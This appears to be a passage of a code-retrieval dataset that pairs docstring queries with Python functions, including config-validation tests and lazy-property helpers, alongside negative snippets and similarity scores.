valid_aws_provider = {\n CFG_CP_AWS_REGION: 'correct-Region-1',\n CFG_CP_AWS_SUBNET: 'subnet-2345145',\n CFG_CP_AWS_KEY_PAIR: 'foo',\n CFG_CP_AWS_SECURITY_GROUP: 'sg-2345145'\n }\n\n # test correct value\n cfg[CFG_CLOUD_PROVIDER] = valid_aws_provider\n ElasticBlastConfig(cfg, task = ElbCommand.SUBMIT)\n\n # test missing value\n cfg[CFG_CLOUD_PROVIDER] = {CFG_CP_AWS_SUBNET: 'test-subnet'}\n with pytest.raises(UserReportError) as err:\n ElasticBlastConfig(cfg, task = ElbCommand.SUBMIT)\n messages = str(err.value).split('\\n')\n assert messages\n assert [s for s in messages if s.startswith('Missing aws-region')]\n\n # test incorrect value\n cfg[CFG_CLOUD_PROVIDER] = {CFG_CP_AWS_REGION: 'incorrect_region'}\n with pytest.raises(UserReportError) as err:\n ElasticBlastConfig(cfg, task = ElbCommand.SUBMIT)\n messages = str(err.value).split('\\n')\n assert messages\n assert [s for s in messages if s.startswith('Parameter \"aws-region\" has an invalid value')]\n\n # Test BLAST programs\n cfg[CFG_CLOUD_PROVIDER] = valid_aws_provider\n # test missing BLAST program\n cfg[CFG_BLAST] = {CFG_BLAST_RESULTS: 's3://test-results'}\n with pytest.raises(UserReportError) as err:\n ElasticBlastConfig(cfg, task = ElbCommand.SUBMIT)\n messages = str(err.value).split('\\n')\n assert messages\n assert [s for s in messages if s.startswith('Missing program')]\n\n # test invalid BLAST program\n cfg[CFG_BLAST] = {CFG_BLAST_PROGRAM: 'invalid_program',\n CFG_BLAST_RESULTS: 's3://test-results'}\n with pytest.raises(UserReportError) as err:\n ElasticBlastConfig(cfg, task = ElbCommand.SUBMIT)\n messages = str(err.value).split('\\n')\n assert messages\n assert [s for s in messages if s.startswith('Parameter \"program\" has an invalid value')]", "def _check_tokens_are_valid(format_string, message):\n named_tokens = re.findall(r\"{(\\w*)}\", format_string)\n invalid_tokens = [x for x in named_tokens if x.lower() not in _valid_tokens]\n if invalid_tokens:\n msg = message\n msg += \" [{0}]. \".format(\", \".join(invalid_tokens))\n msg += 'Did you check your \"modules.yaml\" configuration?'\n raise RuntimeError(msg)", "def testParse_invalidKey(self):\n config_path = GetTestFilePath('invalid/config_invalid_key.yaml')\n with self.assertRaises(lab_config.ConfigError):\n with open(config_path, 'r') as f:\n lab_config.Parse(f)", "def test_arg_astringUnmatchedLiteralBraces(self):\n self.assertRaises(imap4.IllegalClientResponse,\n self.server.arg_astring, b'{0')", "def value_from_str(self, s):\n if s == 'sys.stderr':\n ### print(\"DecoSettingFile.value_from_str, s=%s, returning %r (sys.stderr?)\" % (s, sys.stderr))\n return sys.stderr\n # 'sys.stdout' ultimately becomes None via this:\n return super().value_from_str(s)", "def __verify_string_field(cls, plugin_instance, field_name, field_value):\n\n if not isinstance(field_value, str):\n raise BadPluginError(\n class_name=type(plugin_instance).__name__, field_name=field_name\n )\n if not field_value:\n raise BadPluginError(\n class_name=type(plugin_instance).__name__,\n field_name=field_name,\n is_empty=True,\n )", "def test_bad_config_recovery(mock_empty_os_environ):\n\n def check(d):\n if d and \"wrong\" in d:\n raise KeyError(\"Invalid config\")\n return d\n\n climate = core.Climate(prefix=\"this\", settings_file_suffix=\"suffix\", parser=check)\n assert dict(climate.settings) == {}\n\n # Try to set incorrect config\n with pytest.raises(KeyError):\n climate.update({\"wrong\": 2})\n assert dict(climate.settings) == {}, \"Setting should not have been updated\"\n assert climate._updates == [], \"No external data should have been set.\"\n\n # Updating with other fields will still trigger the error\n climate.update({\"right\": 2})\n assert dict(climate.settings) == {\"right\": 2}\n assert climate._updates == [{\"right\": 2}], \"External data should have been set.\"", "def test_modifier_parse_exceptions():\n\n parser = ConfigParser(io.StringIO())\n with pytest.raises(ConfigParserException):\n parser._parse_multi_range(u\"A\", u\"potential1 1.0 2.0 3.0 potential2 2.0\")", "def test_buoy_format1():\n with pytest.raises(AssertionError) as err_info:\n Check_BuoyDC.check_buoy_format(buoy_format_fail_1)\n assert str(err_info.value) == 'Input formatted incorrectly, see instructions'", "def test_empty(self):\n record = ''\n\n self.assertRaises(ParseException, self.grammar.parseString, record)", "def test_validate_with_invalid_key_format_type(self):\n key_format_type = \"invalid\"\n kwargs = {'key_format_type': key_format_type}\n\n self.assertRaisesRegex(\n TypeError, \"invalid key format type\", Digest, **kwargs)", "def _str_validator(arg):\n if arg is None or arg is '' or type(arg) != str:\n raise ValueError('Incorrect value: input should be a string')", "def test_old_data_format_error(self):\n assert_raises(ValueError, get_data, self.testv1)", "def test_friendly_exception_formatting_exc_with_str_overload():\n ex = InsufficientSignatures(1, 3)\n\n formatted_exception = friendlyEx(ex)\n\n assert formatted_exception == '{}'.format(ex.reason)", "def test_format_name_attribute():\n formatter = TabularOutputFormatter(format_name=\"plain\")\n assert formatter.format_name == \"plain\"\n formatter.format_name = \"simple\"\n assert formatter.format_name == \"simple\"\n\n with pytest.raises(ValueError):\n formatter.format_name = \"foobar\"", "def Invalid(\r\n self, s: str = \"\", e: Type[BaseException] = None, fail: bool = False\r\n) -> None:\r\n ...", "def test_set_invalid_string_percentage(self):\n\n with self.assertRaises(ValueError):\n self.feature_test.set_percentage(\"meow\")", "async def test_return_error_if_any(request_format): # type: ignore[no-untyped-def]\n bad_python = \"this_is_bad = 'hihi\"\n\n response: HTTPResponse = await request_format(\n formatter=\"black\",\n code=[bad_python],\n options={\"line_length\": 123, \"string_normalization\": False},\n )\n json_result = _check_http_code_and_schema(\n response=response,\n expected_code=200,\n expected_schema=EXPECTED_FROMAT_SCHEMA,\n )\n assert json_result[\"code\"][0][\"error\"] == \"Cannot parse: 1:13: this_is_bad = 'hihi\"", "def test_constructor_bad_value(self):\n self.assertRaises(line_format_errors.InputLineError,\n lambda: C2Line(self.bad_line))", "def test_set_property_invalid(self):\r\n try:\r\n initial_value = self.config.values['option1']\r\n self.config.option1 = 'invalid'\r\n except Exception as e:\r\n self.assertIsInstance(e, InvalidOptionValueError)\r\n self.assertEqual(self.config.values['option1'], initial_value)", "def getstr(self, sec, name, default=None, badtypeok=False, morevars=None,\n taskvars=None):\n if sec in self.OLD_SECTIONS:\n sec = 'config'\n\n try:\n return super().getstr(sec, name, default=None,\n badtypeok=badtypeok, morevars=morevars,\n taskvars=taskvars).replace('//', '/')\n except NoOptionError:\n # if config variable is not set\n self.check_default(sec, name, default)\n return default.replace('//', '/')", "def test_creation_str():\n with pytest.raises(ValueError) as __:\n value = \"42\"\n __ = param.Integer(value=value)", "def test_recipient_not_str_error(\n config,\n):\n sms = YesssSMS.YesssSMS(\"0000000000\", \"2d4faa0ea6f55813\")\n with pytest.raises(ValueError):\n sms.send(176264916361239, \"test\")", "def test_datetime_invalid_string(self):\n self.assertRaises(RuntimeError, awstats_reader.awstats_datetime, '2009')", "def test_invalidValues(self):\n argV = \"--fooint egg\".split()\n self.assertRaises(usage.UsageError, self.usage.parseOptions, argV)", "def test_config_key_error():\n c = core.Config()\n\n with pytest.raises(KeyError):\n c['doesNotExist']", "def _check_with_cp_no_format(self, field, value):\n if not self._is_valid_cp_format(value):\n self._error(field, \"Invalid cellphone number format.\")", "def test_missing_key_from_config_fails_with_error(self, custom_config):\n del custom_config['subject']\n check = CommitMessagesCheck(CheckConfig('whatever', 'error', **custom_config))\n result = check.run({'commits': [{'message': 'xxxxx', 'sha': 'aa', 'url': ''}]})[\n 0\n ]\n\n assert result.success is False\n assert result.status is 'error'\n assert result.error_code is 'invalid_content'\n assert \"Missing key: 'stats'\" in result.details['message']", "def format_field(self, value, format_spec):\n if value is None:\n return format(value)\n else:\n return super(NoneFormatter, self).format_field(value, format_spec)\n if value is None:\n return format(value)\n else: raise e", "def test_error_on_invalid_volume_yaml(self):\n config = dict(\n version=1,\n applications={'mysql-hybridcluster': dict(\n image='busybox',\n volume='a random string',\n )}\n )\n parser = Configuration()\n exception = self.assertRaises(ConfigurationError,\n parser._applications_from_configuration,\n config)\n self.assertEqual(\n \"Application 'mysql-hybridcluster' has a config error. \"\n \"Invalid volume specification. Unexpected value: a random string\",\n exception.message\n )", "def test_validate_gcp_config():\n cfg = configparser.ConfigParser()\n cfg.read(f\"{TEST_DATA_DIR}/correct-cfg-file.ini\")\n ElasticBlastConfig(cfg, task = ElbCommand.SUBMIT)\n\n # test correct parameter values\n cfg[CFG_CLOUD_PROVIDER] = {CFG_CP_GCP_PROJECT: 'correct-gcp-project',\n CFG_CP_GCP_REGION: 'correct-region-123',\n CFG_CP_GCP_ZONE: 'correct-zone-456'}\n ElasticBlastConfig(cfg, task = ElbCommand.SUBMIT)\n\n\n # test missing parameter values\n cfg[CFG_CLOUD_PROVIDER] = {CFG_CP_GCP_NETWORK: 'test-network'}\n with pytest.raises(UserReportError) as err:\n ElasticBlastConfig(cfg, task = ElbCommand.SUBMIT)\n messages = str(err.value).split('\\n')\n assert len(messages) >= 3\n assert [s for s in messages if s.startswith('Missing gcp-project')]\n assert [s for s in messages if s.startswith('Missing gcp-region')]\n assert [s for s in messages if s.startswith('Missing gcp-zone')]\n\n # test incorrect parameter values\n cfg[CFG_CLOUD_PROVIDER] = {CFG_CP_GCP_PROJECT: 'UPPERCASE-project',\n CFG_CP_GCP_REGION: 'region with space',\n CFG_CP_GCP_ZONE: 'zone-with#'}\n with pytest.raises(UserReportError) as err:\n ElasticBlastConfig(cfg, task = ElbCommand.SUBMIT)\n messages = str(err.value).split('\\n')\n assert len(messages) >= 3\n assert [s for s in messages if s.startswith('Parameter \"gcp-project\" has an invalid value')]\n assert [s for s in messages if s.startswith('Parameter \"gcp-region\" has an invalid value')]\n assert [s for s in messages if s.startswith('Parameter \"gcp-zone\" has an invalid value')]", "def _incomplete_error(self, option_name):\n msg = \"'{}' must be specified for the '{}' section.\".format(option_name, self._SECTION_NAME)\n raise ValueError(msg)", "def log_format_error(caught_exception, event_str):\n\tcheck_type(caught_exception, Exception)\n\tcheck_type(event_str, StringType)\n\t\n\treturn '{0}, Class: {1}:{2}'.format(event_str, str(type(caught_exception)), caught_exception)", "def _validate_str(val):\n if not isinstance(val, str):\n raise ValueError(\"Passed value {} is not a string\".format(val))\n return val", "def test_decode_raises_when_format_unknown(thing):\n with pytest.raises(ValueError):\n decode(thing)", "def check_dataset_format(ds_format):\n if ds_format.lower() not in DATASET_FORMATS.keys():\n raise ValueError(\"dataset_format is expected to be one of %s. '%s' is not valid\" % (\n ', '.join(DATASET_FORMATS.keys()), ds_format,))", "def _invalid_option_error(self, option_name):\n msg = \"'{}' is not a valid option for the '{}' section.\".format(option_name, self._SECTION_NAME)\n raise ValueError(msg)", "def testParse_emptyHostConfigs(self):\n # Has host_configs field but the field is empty is invalid.\n # This can not be pased by java's yaml lib.\n config_path = GetTestFilePath('invalid/config_empty_host_configs.yaml')\n with self.assertRaisesRegex(\n lab_config.ConfigError,\n r'when expecting a sequence\\nfound a blank string'):\n with open(config_path, 'r') as f:\n lab_config.Parse(f)", "def get_data_type_error_text(field_name, field_value, type_name):\n\n\tmessage = ''\n\n\ttry:\n\t\tmessage = (\"Value '{0}' entered for '{1}' could not be parsed as a valid {2}\"\n\t\t\t\t .format(str(field_value),field_name,type_name))\n\texcept TypeError:\n\t\tmessage = (\"A value entered for '{0}' could not be read\".format(field_name))\n\n\treturn message", "def _validate_value_formats(params, error_callback):\n try:\n local_ip = netaddr.IPNetwork(params['local_ip'])\n if local_ip.prefixlen == 32:\n raise netaddr.AddrFormatError('Invalid netmask')\n # If IPv6 the ctlplane network uses the EUI-64 address format,\n # which requires the prefix to be /64\n if local_ip.version == 6 and local_ip.prefixlen != 64:\n raise netaddr.AddrFormatError('Prefix must be 64 for IPv6')\n except netaddr.core.AddrFormatError as e:\n message = ('local_ip \"%s\" not valid: \"%s\" '\n 'Value must be in CIDR format.' %\n (params['local_ip'], str(e)))\n error_callback(message)\n hostname = params['undercloud_hostname']\n if hostname is not None and '.' not in hostname:\n message = 'Hostname \"%s\" is not fully qualified.' % hostname\n error_callback(message)", "def test_friendly_exception_formatting_exc_without_str_overload():\n ex = SigningException()\n\n formatted_exception = friendlyEx(ex)\n\n assert formatted_exception == '{}'.format(ex)", "def test_incorrect_formats(self, text):\n with pytest.raises(ValueError):\n parse_changelog(text)", "def test_model_output_is_missing_in_config(self):\n with self.assertRaisesRegex(\n ValueError, 'The config \\'Prediction field\\' should contain'):\n self.ci.run_with_metadata(\n indexed_inputs=self.dataset.indexed_examples,\n model=self.model,\n dataset=self.dataset,\n config={'Label': 'red'})", "async def test_can_use_black_config(request_format): # type: ignore[no-untyped-def]\n given = \"some_string='abc'\"\n expected = \"some_string = 'abc'\"\n\n response: HTTPResponse = await request_format(\n formatter=\"black\",\n code=[given],\n options={\"line_length\": 123, \"string_normalization\": False},\n )\n json_result = _check_http_code_and_schema(\n response=response,\n expected_code=200,\n expected_schema=EXPECTED_FROMAT_SCHEMA,\n )\n assert json_result[\"code\"][0][\"code\"] == expected", "def test_feed_value_throws_on_invalid_data(self):\n self.assertRaises(\n ValueError, self.factory.make_from_feed_value, \"foo\", 1\n )", "def raise_not_enough_arguments(self, string):\n\n\t\trequested = errors.number(self.counter + 1)\n\n\t\tnumber = len(self.positional)\n\n\t\tverb = \"was\" if number == 1 else \"were\"\n\n\t\twhat = \"Requested {} formatting argument for \"\\\n\t\t\t \"'{}' but only {} {} supplied!\"\n\n\t\twhat = what.format(requested, string, number, verb)\n\n\t\traise errors.ArgumentError(what)", "def test_broken_config(broken_config):\n with pytest.raises(RuntimeError, match=\"Error reading config.yml\"):\n abcconfig.get_config(broken_config)", "def fix_c4_002_005_missing_value(self, file, error_message):\n variable = file.split('_')[0]\n error_info = \"Corrected error where {} : correct missing value of 1.0e+20f inserted\".format(\n error_message.split('::')[-1].strip())\n self.ncatt._run_ncatted('missing_value', variable, 'o', 'f', '1.0e20', file, newfile=ofile)\n return error_info", "def format_to_print(key, value):\n if value < 0:\n sign = \"-\"\n else:\n sign = \"\"\n\n key = key.upper()\n if key.replace(\"_ERR\", \"\") not in (FLOAT_PARAMS + STR_PARAMS):\n raise ValueError(\"invalid key %r\" % key)\n\n if key in FLOAT_PARAMS or isinstance(value, basestring):\n return str(value)\n elif key in ['RA', 'RAJ', 'RA_ERR', 'RAJ_ERR']:\n sec = value / SIDFREQ\n if '_ERR' in key:\n return str(sec)\n m, s = divmod(sec, 60)\n h, m = divmod(m, 60)\n sign = \"\"\n if s >= 9.9995:\n return \"%s%.2d:%.2d:%.5f\" % (sign, h, m, s)\n else:\n return \"%s%.2d:%.2d:0%.5f\" % (sign, h, m, s)\n elif key in ['DEC', 'DECJ', 'DEC_ERR', 'DECJ_ERR']:\n # taken from: lscsoft/src/lalsuite/lalapps/src/pulsar\n # /HeterodyneSearch/pulsarpputils.py\n arc = np.degrees(np.fmod(np.fabs(value), np.pi))\n d = int(arc)\n arc = (arc - d) * 60.0\n m = int(arc)\n s = (arc - m) * 60.0\n if '_ERR' in key:\n return str(s)\n if s >= 9.9995:\n return \"%s%.2d:%.2d:%.5f\" % (sign, d, m, s)\n else:\n return \"%s%.2d:%.2d:0%.5f\" % (sign, d, m, s)\n else:\n raise TypeError(\"cannot format argument %s with value %r\"\n % (key, value))", "def test_error_on_volume_mountpoint_not_ascii(self):\n mountpoint_unicode = u'\\u2603'\n config = dict(\n version=1,\n applications={'mysql-hybridcluster': dict(\n image='busybox',\n volume={'mountpoint': mountpoint_unicode},\n )}\n )\n parser = Configuration()\n exception = self.assertRaises(ConfigurationError,\n parser._applications_from_configuration,\n config)\n self.assertEqual(\n \"Application 'mysql-hybridcluster' has a config error. \"\n \"Invalid volume specification. Mountpoint {mount} contains \"\n \"non-ASCII (unsupported).\".format(mount=mountpoint_unicode),\n exception.message\n )" ]
[ "0.6889008", "0.65927273", "0.6343142", "0.6240334", "0.60607684", "0.60268956", "0.5999315", "0.5850035", "0.58428705", "0.5835579", "0.5832608", "0.58293426", "0.58019817", "0.57879996", "0.5760329", "0.5742128", "0.57138693", "0.5656415", "0.5598235", "0.5593386", "0.5593015", "0.55859166", "0.55654144", "0.5528895", "0.5522541", "0.5508984", "0.54943436", "0.5492323", "0.54918927", "0.5490297", "0.5473431", "0.5453502", "0.54433256", "0.54355437", "0.5432062", "0.5424596", "0.5423571", "0.5395541", "0.5376848", "0.5373948", "0.53452104", "0.53438497", "0.5342349", "0.5335442", "0.53279537", "0.5316752", "0.53158695", "0.53123", "0.52935624", "0.52811205", "0.5277164", "0.52702767", "0.5269111", "0.526648", "0.52620786", "0.5247126", "0.52443475", "0.522913", "0.52255905", "0.52163064", "0.5204737", "0.52038336", "0.5200257", "0.51997083", "0.5182625", "0.51803505", "0.5174071", "0.51731455", "0.5172848", "0.5163374", "0.5157086", "0.5152675", "0.51521325", "0.5150432", "0.514392", "0.51416177", "0.5140807", "0.51366967", "0.5133895", "0.51334757", "0.5132931", "0.51314", "0.51282334", "0.5126051", "0.51246583", "0.5123259", "0.512064", "0.51157737", "0.51114553", "0.5110822", "0.5108811", "0.51041436", "0.5101994", "0.5100784", "0.50949043", "0.50941443", "0.5091492", "0.508215", "0.50789946", "0.507635", "0.5074067" ]
0.0
-1
Overloaded to implement recursive lazy evaluation of properties.
def __getattribute__(self, key): value = super(Config, self).__getattribute__(key) if key == "reserved" or key in self.reserved: return value else: return self.format(value, key)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def lazyprop(fn):\n\n @property\n def _lazyprop(self):\n if not hasattr(self, _LAZY_PROP_VALUES):\n setattr(self, _LAZY_PROP_VALUES, {})\n lazy_props_dict = self.__dict__[_LAZY_PROP_VALUES]\n if fn.__name__ not in lazy_props_dict:\n lazy_props_dict[fn.__name__] = fn(self)\n return lazy_props_dict[fn.__name__]\n\n return _lazyprop", "def lazyproperty(f: Callable[..., Any]):\n # pylint: disable=unused-variable\n return property(functools.lru_cache(maxsize=100)(f))", "def test_lazy_evaluation(self):\n pass", "def has_lazyprop(object, property_name):\n if hasattr(object, _LAZY_PROP_VALUES):\n return property_name in object.__dict__[_LAZY_PROP_VALUES]\n return False", "def lazy(fn):\n attr_name = '_lazy_' + fn.__name__\n @property\n def _lazyprop(self):\n if not hasattr(self, attr_name):\n setattr(self, attr_name, fn(self))\n return getattr(self, attr_name)\n return _lazyprop", "def lazy_property_factory(lazy_property):\n def lazy_property_getter(self):\n if not hasattr(self, '_' + lazy_property):\n self.load()\n if not hasattr(self, '_' + lazy_property):\n raise ValueError(\"{} wasn't loaded\".format(lazy_property))\n return getattr(self, '_' + lazy_property)\n\n def lazy_property_setter(self, value):\n setattr(self, '_' + lazy_property, value)\n\n return lazy_property_getter, lazy_property_setter", "def evaluate_lazy_object(obj):\n wrapped_obj = getattr(obj, LAZY_OBJECT_NAME, None)\n if wrapped_obj is None:\n # if it isn't a lazy object then just return the original object...\n return obj\n if wrapped_obj is uninitialized_lazy_object:\n # if it is a lazy object but, hasn't been initialized yet\n # then initialize it & return it\n obj._setup()\n return getattr(obj, LAZY_OBJECT_NAME)\n # return the lazy object...\n return wrapped_obj", "def cached_property(f):\r\n def get(self):\r\n try:\r\n return self._property_cache[f]\r\n except AttributeError:\r\n self._property_cache = {}\r\n x = self._property_cache[f] = f(self)\r\n return x\r\n except KeyError:\r\n x = self._property_cache[f] = f(self)\r\n return x\r\n \r\n return property(get)", "def lazy_properties(*lazy_properties):\n def lazy_property_factory(lazy_property):\n \"\"\"Create properties that perform lazy loading of attributes.\"\"\"\n def lazy_property_getter(self):\n if not hasattr(self, '_' + lazy_property):\n self.load()\n if not hasattr(self, '_' + lazy_property):\n raise ValueError(\"{} wasn't loaded\".format(lazy_property))\n return getattr(self, '_' + lazy_property)\n\n def lazy_property_setter(self, value):\n setattr(self, '_' + lazy_property, value)\n\n return lazy_property_getter, lazy_property_setter\n\n def wrap_dataset(dataset):\n if not issubclass(dataset, InMemoryDataset):\n raise ValueError(\"Only InMemoryDataset supports lazy loading\")\n\n # Attach the lazy loading properties to the class\n for lazy_property in lazy_properties:\n setattr(dataset, lazy_property,\n property(*lazy_property_factory(lazy_property)))\n\n # Delete the values of lazy properties when serializing\n if not hasattr(dataset, '__getstate__'):\n def __getstate__(self):\n serializable_state = self.__dict__.copy()\n for lazy_property in lazy_properties:\n attr = serializable_state.get('_' + lazy_property)\n # Iterators would lose their state\n if isinstance(attr, collections.Iterator):\n raise ValueError(\"Iterators can't be lazy loaded\")\n serializable_state.pop('_' + lazy_property, None)\n return serializable_state\n setattr(dataset, '__getstate__', __getstate__)\n\n return dataset\n return wrap_dataset", "def clear_lazyprop(object, property_name):\n assert isinstance(property_name, str)\n\n if _LAZY_PROP_VALUES in object.__dict__:\n if property_name in object.__dict__[_LAZY_PROP_VALUES]:\n del object.__dict__[_LAZY_PROP_VALUES][property_name]\n\n if _LAZY_PROP_SUBSCRIBERS in object.__dict__:\n if property_name in object.__dict__[_LAZY_PROP_SUBSCRIBERS]:\n for fn in object.__dict__[_LAZY_PROP_SUBSCRIBERS][property_name]:\n fn(object)", "def properties(expression, stream):\n def index(expression, stream):\n item = expression.children[0].children[0]\n for node in stream:\n if isinstance(node, Object):\n yield node.get(item, null)\n elif not optional(expression):\n itype = expression.children[0].data\n if itype == 'cname':\n itype = 'string'\n raise TypeError(\n 'cannot index {} with {}'.format(\n node.__class__.__name__, itype\n )\n )\n\n for expression in expression.children:\n stream = index(expression, stream)\n\n for node in stream:\n yield node", "def cached_property(func):\n return Property(fget=func, cached=True)", "def _get_property(self, xpaths):\n result = None\n for xpath in xpaths:\n result = self[xpath]\n if len(result) > 0:\n break\n\n return result", "def clear_all_lazyprops(object):\n if _LAZY_PROP_VALUES in object.__dict__:\n del object.__dict__[_LAZY_PROP_VALUES]\n\n if _LAZY_PROP_SUBSCRIBERS in object.__dict__:\n for subscribers in object.__dict__[_LAZY_PROP_SUBSCRIBERS].values():\n for fn in subscribers:\n fn(object)", "def _cache_property_mutator(self, name):\n try:\n methods = self.instance_properties[name]\n except KeyError:\n methods = self._cache_property_methods(name)\n self.instance_properties[name] = methods\n if methods:\n return methods[1]\n return None", "def subscribe_to_lazy_prop(object, property_name, on_change_func):\n assert isinstance(property_name, str)\n\n if not hasattr(object, _LAZY_PROP_SUBSCRIBERS):\n setattr(object, _LAZY_PROP_SUBSCRIBERS, defaultdict(lambda: set()))\n\n object.__dict__[_LAZY_PROP_SUBSCRIBERS][property_name].add(on_change_func)", "def child_properties(self):\n response = check_defined(self, inspect.stack()[0][3])\n if not response:\n return response\n children = self.se.property_only_graph.successors(self.uri)\n result = restructure_output(self,\n children,\n inspect.stack()[0][3],\n self.output_type)\n return result", "def __getattribute__(self, name):\n if name == '__root__' or name == '__pepth__':\n return list.__getattribute__(self, name)\n if not name.endswith('___') and name.startswith('__') and name.endswith('__'):\n raise AttributeError('plist objects cannot call reserved members of their elements: \\'%s\\'' % name)\n try:\n return plist.__getattr__(self, name)\n except AttributeError:\n pass\n if ((name.startswith('__') and name.endswith('___'))\n or (not name.startswith('__') and name.endswith('_'))):\n # Allows calling one level deeper by adding '_' to the end of a property name. This is recursive, so '__' on the end goes two levels deep, etc.\n # Works for both regular properties (foos.bar_) and private properties (foos.__len___).\n try:\n starting_unders = 2 if name.startswith('__') else 0 # We don't care about single starting underscores for this count\n ending_unders = 0\n for i in range(len(name) - 1, 0, -1):\n if name[i] == '_':\n ending_unders += 1\n else:\n break\n ending_unders -= starting_unders\n return plist.__getattr__(self, name[:-ending_unders], _pepth=ending_unders)\n except AttributeError:\n pass\n try:\n if plist.all(self, hasattr, name):\n return plist([getattr(x, name) for x in self], root=self.__root__)\n return plist([x[name] for x in self], root=self.__root__)\n except Exception as e:\n raise AttributeError('plist children raised exceptions attempting to get attribute \\'%s\\' (%s)' % (name, str(e)))", "def propertyListGenerator(name, cls):\n\n memo = dict()\n\n def propertyValueFromNodeGetter(instance):\n \"\"\"Get the actual property value from an instance.\n\n instance - a ComputedGraph location that the property is tied to.\n \"\"\"\n\n subspace = nodeGetter(instance)\n\n if SynchronousPropertyAccess.SynchronousPropertyAccess.getCurrent() is not None:\n if not subspace.loaded:\n subspace.keyspace.waitLoaded()\n else:\n subspace.keyspace.ensureSubscribed()\n\n val = subspace.value\n\n if val is None:\n return default()\n\n return val[0]\n\n def propertyValueFromNodeSetter(instance, val):\n \"\"\"Set the property value 'name' in instance 'instance' to 'val'\n\n We must be in 'synchronous' mode for this to work. We'll load the\n keyspace if its not loaded.\n \"\"\"\n\n subspace = nodeGetter(instance)\n\n if SynchronousPropertyAccess.SynchronousPropertyAccess.getCurrent() is not None:\n if not subspace.loaded:\n subspace.keyspace.waitLoaded()\n\n if subspace.value != (val,):\n subspace.value = (val,)\n\n def nodeGetter(instance):\n \"\"\"Produces a CGSS.Node.Node object corresponding to this property's value.\n\n We use the hash of the result of the documentGetter function to decide which keyspace\n we want to use, and then we hash the pair (instance, name) to decide which key\n to use.\n \"\"\"\n if (instance, name) not in memo:\n subspace = subspaceFunction(instance)\n\n if subspace is None:\n assert False, \"Instance %s produced an empty subspace\" % instance\n\n memo[(instance,name)] = subspace.subspace(name)\n return memo[(instance,name)]\n\n return [\n (name, ComputedGraph.Property(propertyValueFromNodeGetter,propertyValueFromNodeSetter))\n ]", "def _cache_property_accessor(self, name):\n try:\n methods = self.instance_properties[name]\n except KeyError:\n methods = self._cache_property_methods(name)\n self.instance_properties[name] = methods\n if methods:\n return methods[0]\n return None", "def _query_properties(self, props=None, depth=0):\n root = None\n # build the propfind request\n if props is not None and len(props) > 0:\n prop = dav.Prop() + props\n root = dav.Propfind() + prop\n\n return self._query(root, depth)", "def getPropertiesAll():", "def load(self):\n for prop in self.properties:\n try:\n value = getattr(self, prop)\n self._prop_dict[prop] = value\n except AttributeError as ate:\n pass", "def _determine_properties(self, paramdict):\n for var in paramdict:\n if is_dimensionless(paramdict[var]):\n self._all_params_unit[var] = \"none\"\n yield lems.Property(var, \"none\")\n else:\n dim = _determine_dimension(paramdict[var])\n self._all_params_unit[var] = dim\n yield lems.Property(var, dim)", "def load_recursive_state_dict(x, obj):\n if hasattr(obj, 'load_state_dict'):\n obj.load_state_dict(x)\n if isinstance(x, (tuple, list)):\n for xx, oo in zip(x, obj):\n load_recursive_state_dict(xx, oo)\n if isinstance(x, dict):\n for k in objs.keys():\n load_recursive_state_dict(xx[k], oo[k])", "def test_get_all_ancestor_properties(self):\n pass", "def __(self):\n self.__pepth__ = self.pdepth(True)\n return self", "def property_setup(self, properties):\n return properties", "def _eval_shallow(servicedef, obj, need_copy=False):\n\n # _eval_shallow() resolves $ref and $merge to their values in\n # source and with_. This is a *shallow* evaluation in that embedded\n # $ref or $merge at deeper levels are *not* resolved.\n #\n # For example, the following will be resolved:\n # { $ref: ... }\n # { $merge: ... }\n #\n # But the following will *not* be resolved\n # { type: object,\n # properties: { x: { $ref: ... } } }\n #\n # Need to loop in the event that a $ref resolves to another $ref\n # or a $ref to a $merge:\n #\n # { $ref: <target1> } --> { $ref: <target2> } --> { <value2> }\n #\n\n # Minimize copies so that we don't bloat memory\n done = False\n is_copy = False\n while not done:\n if '$merge' in obj:\n with Parser(obj['$merge'], 'eval_shallow') as merge_parser:\n merge_source = merge_parser.parse('source', save=False,\n required=True)\n merge_with = merge_parser.parse('with', save=False,\n required=True)\n\n # This always returns a copy\n obj = json_merge_patch(servicedef, merge_source, merge_with)\n is_copy = True\n\n elif '$ref' in obj:\n if len(list(obj.keys())) != 1:\n raise ParseError(\n \"$ref object may not have any other properties\", obj)\n\n sch = servicedef.find(obj['$ref'])\n obj = sch.input\n is_copy = False\n\n else:\n done = True\n\n if not is_copy and need_copy:\n obj = copy.copy(obj)\n\n return obj", "def build_property(value_token: ValueToken) -> property:\n def caller(_: Any) -> Any:\n return value_token.get_value()\n return property(caller)", "def properties(self):\n raise NotImplementedError", "def _lock_property(self, **properties):\n self._property_lock = properties\n try:\n yield\n finally:\n self._property_lock = {}", "def go_next(context: Context) -> None:\n\n state = context.decode_state()\n if not state:\n print('Selected frame is not in a property.')\n return\n\n # If execution reached the part of the code where the property is about to\n # return a cached result, just let it return.\n if state.in_memoization_lookup:\n gdb.execute('finish')\n return\n\n scope_state, current_expr = state.lookup_current_expr()\n\n if current_expr is None:\n # There are only two possible causes for no currently evaluating\n # expressions: either the property just started (root expression\n # evaluation is ahead), either it is about to return (root expr. eval.\n # is behind).\n bp_group = break_scope_start(context, state.property_scope.scope,\n from_line_no=state.line_no)\n\n if bp_group:\n # The first expression is ahead: resume execution until we reach\n # it.\n gdb.execute('continue')\n else:\n gdb.execute('finish')\n\n else:\n # Depending on the control flow behavior of the currently running\n # expression, the next step can be either its parent expression or any\n # of its sub-expressions.\n next_slocs_candidates = []\n\n # First look for the point where the current expression terminates its\n # evaluation.\n next_slocs_candidates.append(current_expr.done_event.line_no)\n\n # Now look for the starting point for all sub-expressions\n for subexpr in current_expr.start_event.sub_expr_start:\n next_slocs_candidates.append(subexpr.line_no)\n\n BreakpointGroup(context, next_slocs_candidates)\n gdb.execute('continue')\n\n new_current_expr = None\n new_expr = None\n\n new_state = context.decode_state()\n if new_state:\n _, new_current_expr = new_state.lookup_current_expr()\n if current_expr:\n new_expr = new_state.lookup_expr(current_expr.expr_id)\n\n # If we just finished the evaluation of an expression, display its value\n if new_expr and new_expr.is_done:\n assert new_state is not None\n print('{} evaluated to: {}'.format(\n expr_repr(new_expr),\n new_expr.read(new_state.frame)\n ))\n\n # Display the expression of most interest, if any\n if new_current_expr:\n print('')\n print('Now evaluating {}'.format(expr_repr(new_current_expr)))", "def Property(name):\n\n attr_name = \"__\" + name\n\n def get(self):\n try:\n return self.__dict__[attr_name]\n except KeyError:\n raise AttributeError, name\n\n def set(self, value):\n if attr_name not in self.__dict__ 